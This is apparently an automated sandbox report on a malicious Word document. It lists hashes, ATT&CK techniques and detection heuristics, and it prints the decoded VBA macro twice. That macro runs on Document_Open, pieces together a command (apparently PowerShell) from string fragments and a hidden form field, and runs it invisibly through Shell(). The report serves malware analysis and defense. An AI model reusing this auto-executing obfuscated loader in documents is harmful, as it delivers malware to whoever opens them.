Office (OLE) malware analysis — malicious · f7ec4cd67a3573f5

MALICIOUS

Office (OLE)

264.0 KB Created: 2019-02-01 20:55:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 63fa3c50d947b71d55c62af42e784294 SHA-1: 11933d3ea25953c60bcb56fd138097af532c47f2 SHA-256: f7ec4cd67a3573f5055ac09a82e934ef680e71ecff577b6e8b08bc7fbc848813

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample contains VBA macros that are automatically executed upon opening the document via the Document_Open subroutine. The macro utilizes the Shell() function to execute a command, indicating an attempt to download and run a secondary payload. The obfuscated nature of the script and the lack of specific indicators prevent definitive family attribution.

Heuristics 6

ClamAV: Doc.Malware.Outbreak-6923440-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Outbreak-6923440-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1586 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1586 bytes
SHA-256: `9a3325f8f2aa2cfc3a8caeebf81252473dd257b79077e9c401dab9d0c913a908`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() If 45 * 13 = 3562 - 3555 Then tDtKeGn = "q6Cxy" End If Dim tu96ocCK As Single tu96ocCK = Round(20521.794670846) Dim hAanT8Em2 As Double hAanT8Em2 = Sgn(58540.935390342) Dim HMkjb As Long HMkjb = (3330 / 370) + (6) love "o" End Sub Attribute VB_Name = "VCAZiq" Sub love(IdZALGS) Dim EQUqVg9N As String EQUqVg9N = Len(YLPIkZX87) Dim yDnCg14 As Long yDnCg14 = (818 - 791) - (13) Dim yD7Emk2X5 As Long yD7Emk2X5 = -833133810 Dim T7056ZwR As Long T7056ZwR = Sgn(0) Dim sBoDH7mZK As Boolean sBoDH7mZK = False cVMhaxQv = "w" Call Shell(KKZUbw(1) & IdZALGS & cVMhaxQv & wFjUXJ, 0) End Sub Attribute VB_Name = "tzUxn" Public Function KKZUbw(OVOcS As Integer) Dim FC4Vz As Integer FC4Vz = Sgn(-24987) KKZUbw = "p" End Function Attribute VB_Name = "d40tNZH" Public Function wFjUXJ() Dim ohw7OLNTg As Object Set ohw7OLNTg = New f Dim YVyOsk As String YVyOsk = ohw7OLNTg.de.Text wFjUXJ = YVyOsk End Function Attribute VB_Name = "f" Attribute VB_Base = "0{62804890-4B05-491F-AF68-137263220262}{7444ABC4-C175-42F9-B391-E988E919CC9E}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 9a3325f8f2aa2cfc3a8caeebf81252473dd257b79077e9c401dab9d0c913a908

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()

If 45 * 13 = 3562 - 3555 Then
tDtKeGn = "q6Cxy"
End If
Dim tu96ocCK As Single
tu96ocCK = Round(20521.794670846)

Dim hAanT8Em2 As Double
hAanT8Em2 = Sgn(58540.935390342)
Dim HMkjb As Long
HMkjb = (3330 / 370) + (6)
love "o"
End Sub

Attribute VB_Name = "VCAZiq"
Sub love(IdZALGS)
Dim EQUqVg9N As String
EQUqVg9N = Len(YLPIkZX87)
Dim yDnCg14 As Long
yDnCg14 = (818 - 791) - (13)
Dim yD7Emk2X5 As Long
yD7Emk2X5 = -833133810
Dim T7056ZwR As Long
T7056ZwR = Sgn(0)
Dim sBoDH7mZK As Boolean
sBoDH7mZK = False
cVMhaxQv = "w"
Call Shell(KKZUbw(1) & IdZALGS & cVMhaxQv & wFjUXJ, 0)
End Sub

Attribute VB_Name = "tzUxn"
Public Function KKZUbw(OVOcS As Integer)
Dim FC4Vz As Integer
FC4Vz = Sgn(-24987)
KKZUbw = "p"
End Function

Attribute VB_Name = "d40tNZH"
Public Function wFjUXJ()
Dim ohw7OLNTg As Object
Set ohw7OLNTg = New f
Dim YVyOsk As String
YVyOsk = ohw7OLNTg.de.Text
wFjUXJ = YVyOsk
End Function

Attribute VB_Name = "f"
Attribute VB_Base = "0{62804890-4B05-491F-AF68-137263220262}{7444ABC4-C175-42F9-B391-E988E919CC9E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.